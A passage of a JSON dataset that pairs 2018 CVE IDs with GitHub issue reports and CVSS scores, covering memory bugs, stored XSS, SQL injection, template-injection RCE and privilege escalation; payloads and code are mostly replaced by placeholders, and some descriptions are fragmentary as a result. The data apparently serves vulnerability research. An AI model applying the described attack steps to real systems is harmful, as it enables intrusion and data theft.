        "description": "APITAG heap buffer overflow APITAG OOB) at APITAG As of NUMBERTAG when running ERRORTAG , it may result in an read out of bound error on variable dp inside APITAG (blind decode mode is ok). ERRORTAG POCs: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19842",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12239",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12239",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-11-20T10:10:46Z",
        "description": "rasm2 built with ASAN reported a stackoverflow during assembling. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | txt | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gdd NUMBERTAG bfe3d commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with an error message. Actual behavior rasm2 crashes with the error message that suggests it's a stack overflow relevant to APITAG ; I'm not sure whether it's reporting correctly since that array is then duplicated and accessed with the duplicated one. ERRORTAG Steps to reproduce the behavior Build APITAG with ASAN Run APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19843",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12242",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12242",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-11-20T13:38:24Z",
        "description": "APITAG global buffer overflow at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | txt | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gdd NUMBERTAG bfe3d commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior Build radare with ASAN run APITAG Additional Logs, screenshots, source code, configuration dump, ... The offset calculated is beyond the bound of APITAG . CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19853",
        "Issue_Url_old": "https://github.com/liu946/hitshop/issues/1",
        "Issue_Url_new": "https://github.com/liu946/hitshop/issues/1",
        "Repo_new": "liu946/hitshop",
        "Issue_Created_At": "2018-11-18T10:46:33Z",
        "description": "There is a Elevation of privilege vulnerability that can control whole website. An issue was discovered in hitshop NUMBERTAG beta. There is a Elevation of privilege vulnerability which allows control the whole website Vulnerability trigger point URLTAG APITAG a normal store keeper FILETAG APITAG use store keeper jurisdiction\uff0cnow we just have the privilege of commodity management. FILETAG APITAG this account add the other administrator privilege account FILETAG APITAG the fake admin account\uff0cand now you have all system privilege. FILETAG You can change the old administrators' password or any other info of this website FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19859",
        "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1840",
        "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1840",
        "Repo_new": "openrefine/openrefine",
        "Issue_Created_At": "2018-11-20T17:14:08Z",
        "description": "Directory traversal APITAG Slip\") vulnerability . Describe the bug It is possible to create files outside the temporary folder by importing a zip file containing files with relative paths. This can be used to create scripts and configurations at locations where they can be picked up by applications, other scripts or executed during start up. Additional information URLTAG To Reproduce Video (zipped video because GH extension restrictions) FILETAG Steps to reproduce the behavior: Create payload and start server on Linux APITAG Steps on openrefine NUMBERTAG Start openrefine ($ ./refine NUMBERTAG Click on APITAG Project NUMBERTAG Click on APITAG Addresses (URLs)\" (also possible through uploading a local zip file NUMBERTAG Insert a malicious URL, eg. FILETAG NUMBERTAG If the file does not exist, the malicious file is silently created If the file does exist, openrefine shows a stack trace (see below) on terminal Current Results No error nor warning. Expected behavior Warn the user about dangerous content in the zip and prevent the creation of the file. Video The video is inside a zip file because github filexetension restrictions. Desktop (please complete the following information): OS: Linux APITAG Debian) Browser Version: Not important JRE or JDK Version: ERRORTAG And ERRORTAG APITAG (please complete the following information): Version NUMBERTAG TRUNK] and NUMBERTAG beta [TRUNK] (maybe also previous versions) Stack trace ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19886",
        "Issue_Url_old": "https://github.com/knik0/faac/issues/23",
        "Issue_Url_new": "https://github.com/knik0/faac/issues/23",
        "Repo_new": "knik0/faac",
        "Issue_Created_At": "2018-12-05T03:52:43Z",
        "description": "Invalid memory address dereference in huffcode (in APITAG . Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19887",
        "Issue_Url_old": "https://github.com/knik0/faac/issues/21",
        "Issue_Url_new": "https://github.com/knik0/faac/issues/21",
        "Repo_new": "knik0/faac",
        "Issue_Created_At": "2018-12-05T03:47:42Z",
        "description": "Invalid memory address dereference in huffcode (in APITAG . Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19888",
        "Issue_Url_old": "https://github.com/knik0/faac/issues/25",
        "Issue_Url_new": "https://github.com/knik0/faac/issues/25",
        "Repo_new": "knik0/faac",
        "Issue_Created_At": "2018-12-05T03:57:32Z",
        "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19889",
        "Issue_Url_old": "https://github.com/knik0/faac/issues/22",
        "Issue_Url_new": "https://github.com/knik0/faac/issues/22",
        "Repo_new": "knik0/faac",
        "Issue_Created_At": "2018-12-05T03:49:55Z",
        "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19890",
        "Issue_Url_old": "https://github.com/knik0/faac/issues/20",
        "Issue_Url_new": "https://github.com/knik0/faac/issues/20",
        "Repo_new": "knik0/faac",
        "Issue_Created_At": "2018-12-05T03:41:25Z",
        "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19891",
        "Issue_Url_old": "https://github.com/knik0/faac/issues/24",
        "Issue_Url_new": "https://github.com/knik0/faac/issues/24",
        "Repo_new": "knik0/faac",
        "Issue_Created_At": "2018-12-05T03:55:04Z",
        "description": "Invalid memory address dereference in huffcode (in APITAG Hi, i found a issue in the FAAC NUMBERTAG it is crashed by function huffcode .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19892",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/85",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/85",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-12-04T19:56:25Z",
        "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of APITAG APITAG APITAG & notes put xss payload \"> APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19893",
        "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/3",
        "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/3",
        "Repo_new": "pbootcms/pbootcms",
        "Issue_Created_At": "2018-12-04T10:40:04Z",
        "description": "Pbootcms SQL injection in FILETAG . The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG FILETAG payload: URLTAG and we can get the damin account username and password",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19906",
        "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/56",
        "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/56",
        "Repo_new": "smiffy6969/razorCMS",
        "Issue_Created_At": "2018-11-03T04:55:58Z",
        "description": "Stored XSS in Razor CMS. Affected software: Razor CMS version NUMBERTAG Type of vulnerability: XSS APITAG XSS) Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Razor CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Vulnerable URL: URLTAG Vulnerable parameter: description Proof of concept: Step1: Login into the Razor cms. Step2: URL: URLTAG FILETAG Here the description parameter is vulnerable to XSS. Step3: Here the xss got executed for description parameter. URL: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19907",
        "Issue_Url_old": "https://github.com/craftercms/craftercms/issues/2677",
        "Issue_Url_new": "https://github.com/craftercms/craftercms/issues/2677",
        "Repo_new": "craftercms/craftercms",
        "Issue_Created_At": "2018-12-05T02:18:39Z",
        "description": "Critical vulnerability: Server Side Template Injection/ RCE Attack. Describe the bug Attackers may execute OS commands by APITAG a template file (.ftl filetype) which use APITAG lib to render webpage. To Reproduce Steps to reproduce the behavior NUMBERTAG Edit a template file FILETAG NUMBERTAG Add code as shown below and OK FILETAG NUMBERTAG iew web page, Window OS command was executed APITAG on windows) FILETAG Specs Version NUMBERTAG OS Windows Browser Firefox",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19913",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/86",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/86",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-12-06T07:08:05Z",
        "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of APITAG Reseller ID & notes put xss payload \"> APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19914",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/87",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/87",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-12-06T08:38:47Z",
        "description": "Cross Site Scripting Vulnerability in APITAG NUMBERTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint PATHTAG At the place of Profile Name & notes put xss payload \"> APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19918",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/3",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/3",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2018-08-16T12:43:07Z",
        "description": "XSS (via SVG file upload) in APITAG Affected software: APITAG Type of vulnerability: XSS (via SVG file upload) Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: SVG files can contain Javascript in APITAG tags. Browsers are smart enough to ignore scripts embedded in SVG files included via IMG tags. However, a direct request for an SVG file will result in the scripts being executed. So an embedded SVG as an attachment in an issue or avatar does not execute the code, but if a user clicks on the attachment the code will execute. Proof of concept: Step1: Login to the cuppa cms. Step2: In the table manager section, add a new file and there is an upload option choose files and upload a malicious SVG file. URL: URLTAG Step3: Now open that file which was saved as NUMBERTAG svg the below output will be shown. URL: FILETAG executed FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19919",
        "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/19",
        "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/19",
        "Repo_new": "pixelimity/pixelimity",
        "Issue_Created_At": "2018-11-03T06:55:09Z",
        "description": "Stored XSS in Pixelimity CMS. Affected software: Pixelimity CMS Type of vulnerability: XSS APITAG XSS) Discovered by: Provensec Website: FILETAG Author: Subodh Kumar Description: Subrion CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Vulnerable URL: FILETAG Vulnerable parameter: Title Proof of concept NUMBERTAG Login as admin NUMBERTAG Locate URL FILETAG and click on APITAG New NUMBERTAG Put XSS payload in the \"data FILETAG NUMBERTAG isit the link URLTAG to execute payload. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19923",
        "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/2",
        "Issue_Url_new": "https://github.com/venan24/scms/issues/2",
        "Repo_new": "venan24/scms",
        "Issue_Created_At": "2018-12-05T07:42:17Z",
        "description": "smcs NUMBERTAG csrf+storage xss. An issue was discovered in Sales & Company Management System (SCMS) through NUMBERTAG APITAG is a discrepancy in email checking between a component that does email code validation, and a component that is the source client validation. Thus, it is possible to update a database query and due to storage xss. this vulnerable occured via FILETAG FILETAG Enter an arbitrarily email address and click the button,wait a moment,can receive the validation code. FILETAG Now,enter the code and update the email payload like this,click the button . FILETAG capture the package via burp suite and generate the csrf poc FILETAG click the img tag FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19925",
        "Issue_Url_old": "https://github.com/Venan24/SCMS/issues/3",
        "Issue_Url_new": "https://github.com/venan24/scms/issues/3",
        "Repo_new": "venan24/scms",
        "Issue_Created_At": "2018-12-05T10:07:57Z",
        "description": "scms NUMBERTAG sql injection. An issue was discovered in Sales & Company Management System (SCMS).It has SQL injection during order operation via the FILETAG O_state parameter. In line NUMBERTAG the parameter state was joined to sql statement CODETAG FILETAG as for the parameter state,it comes from the line NUMBERTAG while scms has been filtered some characters FILETAG It also cause sql injection ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19939",
        "Issue_Url_old": "https://github.com/MiCode/Xiaomi_Kernel_OpenSource/issues/972",
        "Issue_Url_new": "https://github.com/micode/xiaomi_kernel_opensource/issues/972",
        "Repo_new": "micode/xiaomi_kernel_opensource",
        "Issue_Created_At": "2018-11-18T12:50:05Z",
        "description": "NULL pointer dereferencing in the touchscreen driver of daisy o oss branch. There is a suspected NULL pointer dereferencing issue ( CVETAG with the daisy o oss branch, in PATHTAG line NUMBERTAG When kmalloc fails (line NUMBERTAG page remains NULL, but kfree is called (line NUMBERTAG which dereferences the NULL pointer. Possible fix can be remove this line.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19974",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/999",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/999",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2018-12-08T13:10:44Z",
        "description": "Compiled rules can execute malicious code regardless of PARANOID_EXEC. A malicious compiled rule file could escape YARA's virtual machine and execute arbitrary code despite the added checks introduced by APITAG . This is possible due to the design of the virtual machine, which stores and operates on pointers to APITAG s from the virtual stack, as well as the following bugs: APITAG can be used to read a DWORD from any arbitrary address. the VM scratch memory is uninitialized and could leak important addresses from the real stack. I have requested CVE IDs for theses issues and will update here once they are assigned.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1999021",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/797",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/797",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-07-18T11:05:56Z",
        "description": "Stored XSS in profil page. Description : Cross site scripting (XSS) vulnerability in Gleez CMS allow remote attackers (users) to inject arbitrary Javascript or HTML via the profile page editor, which will result in a Stored XSS on his public profile. Vulnerability Type : Stored XSS Attack Vectors NUMBERTAG Go to your profile page editor URLTAG URLTAG NUMBERTAG Set your home page URL to : APITAG Now when someone will check your profile page, APITAG will be executed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19991",
        "Issue_Url_old": "https://github.com/alexazhou/VeryNginx/issues/218",
        "Issue_Url_new": "https://github.com/alexazhou/verynginx/issues/218",
        "Repo_new": "alexazhou/verynginx",
        "Issue_Created_At": "2018-12-09T06:45:59Z",
        "description": "\u7f3a\u5c11\u9519\u8bef\u5904\u7406\u5bfc\u81f4waf\u53ef\u4ee5\u88ab\u7ed5\u8fc7. get_post_args \u548c get_uri_args NUMBERTAG APITAG \u6f0f\u6d1e\u8bc1\u660epython\u811a\u672c\uff1a CODETAG \u5b98\u65b9\u5efa\u8bae\u662f\u4f7f\u7528\u4ee5\u4e0b\u4ee3\u7801\u62d2\u7edd\u53c2\u6570\u8fc7\u591a\u7684\u8bf7\u6c42 ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20004",
        "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/233",
        "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/233",
        "Repo_new": "michaelrsweet/mxml",
        "Issue_Created_At": "2018-12-03T02:38:09Z",
        "description": "Stack buffer overflow in Function mxml_write_node. I used clang NUMBERTAG and APITAG to build FILETAG , this file URLTAG can cause stack buffer overflow in function mxml_write_node in mxml file.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20005",
        "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/234",
        "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/234",
        "Repo_new": "michaelrsweet/mxml",
        "Issue_Created_At": "2018-12-03T03:05:01Z",
        "description": "heap use after free in Function APITAG I used clang NUMBERTAG and APITAG to build FILETAG , this file URLTAG can cause heap use after free in APITAG in mxml search.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20006",
        "Issue_Url_old": "https://github.com/qinggan/phpok/issues/3",
        "Issue_Url_new": "https://github.com/qinggan/phpok/issues/3",
        "Repo_new": "qinggan/phpok",
        "Issue_Created_At": "2018-12-08T10:00:23Z",
        "description": "phpok NUMBERTAG Store XSS vulnerability that can get the administrator cookie. Visit the url: URLTAG Step NUMBERTAG Input Xss payload in the title parameter\uff0csuch as ERRORTAG FILETAG ERRORTAG Step NUMBERTAG When the administrator logs in and moves the mouse over to view message information,it will trigger the payload. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20009",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/88",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/88",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-12-07T12:13:35Z",
        "description": "Two Stored XSS in APITAG NUMBERTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of ssl provider name, ssl provider's url fields put xss payload \"> APITAG FILETAG Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of username field put xss payload \"> APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-20017",
        "Issue_Url_old": "https://github.com/source-trace/semcms/issues/1",
        "Issue_Url_new": "https://github.com/source-trace/semcms/issues/1",
        "Repo_new": "source-trace/semcms",
        "Issue_Created_At": "2018-12-07T08:17:45Z",
        "description": "There has a stored xss vulnerability. An issue was discovered in semcms APITAG has a stored xss which allow retome attacker to excute web script. POC APITAG Vulnerability point FILETAG APITAG as admin FILETAG APITAG this part FILETAG FILETAG APITAG code FILETAG NUMBERTAG submit and homepage FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-20027",
        "Issue_Url_old": "https://github.com/lisa-lab/pylearn2/issues/1593",
        "Issue_Url_new": "https://github.com/lisa-lab/pylearn2/issues/1593",
        "Repo_new": "lisa-lab/pylearn2",
        "Issue_Created_At": "2018-12-11T01:34:42Z",
        "description": "APITAG method is vulnerable. import APITAG test_str PATHTAG [\"ls\"]' test_load = APITAG Hi, there is a vulnerability in load methods in APITAG see APITAG above.\u00a0It can execute arbitrary python commands resulting in command execution.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20059",
        "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/486",
        "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/486",
        "Repo_new": "pippo-java/pippo",
        "Issue_Created_At": "2018-12-11T07:08:21Z",
        "description": "xxe. Hello, I am a member of the NUMBERTAG Code Guard team. In our open source project code audit, we found that Pippo has APITAG vulnerabilities. Details are as follows. PATHTAG FILETAG Because the XML parser does not disable dtd, APITAG attacks can occur when content parameters are controlled by malicious attackers",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20061",
        "Issue_Url_old": "https://github.com/frappe/erpnext/issues/15337",
        "Issue_Url_new": "https://github.com/frappe/erpnext/issues/15337",
        "Repo_new": "frappe/erpnext",
        "Issue_Created_At": "2018-09-06T23:36:16Z",
        "description": "SQL Injection from API?. If you go here: PATHTAG on any erpnext install you get an SQL syntax error which has me worried of what else can be done with some APITAG names should probably be enclosed in ` either which way if this is not a security issue :)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20062",
        "Issue_Url_old": "https://github.com/nangge/noneCms/issues/21",
        "Issue_Url_new": "https://github.com/nangge/nonecms/issues/21",
        "Repo_new": "nangge/nonecms",
        "Issue_Created_At": "2018-12-11T07:08:21Z",
        "description": "There is a vulnerability that can getshell. PATHTAG ERRORTAG ERRORTAG ERRORTAG In the process of processing the route, Config::get(\u2018var_pathinfo\u2019) is used as the receiving process pathinfo, and this value is s by default. then, it will form a calling process: PATHTAG In APITAG ERRORTAG we can use input method POC: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20064",
        "Issue_Url_old": "https://github.com/doorgets/CMS/issues/12",
        "Issue_Url_new": "https://github.com/doorgets/cms/issues/12",
        "Repo_new": "doorgets/cms",
        "Issue_Created_At": "2018-12-11T05:57:32Z",
        "description": "Modify the contents of the file at will. Create a file under the c APITAG is test FILETAG poc\uff1a FILETAG Modify the contents of the file in FILETAG by poc ERRORTAG FILETAG Of course, you can also modify the contents of any file to make the web unusable.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
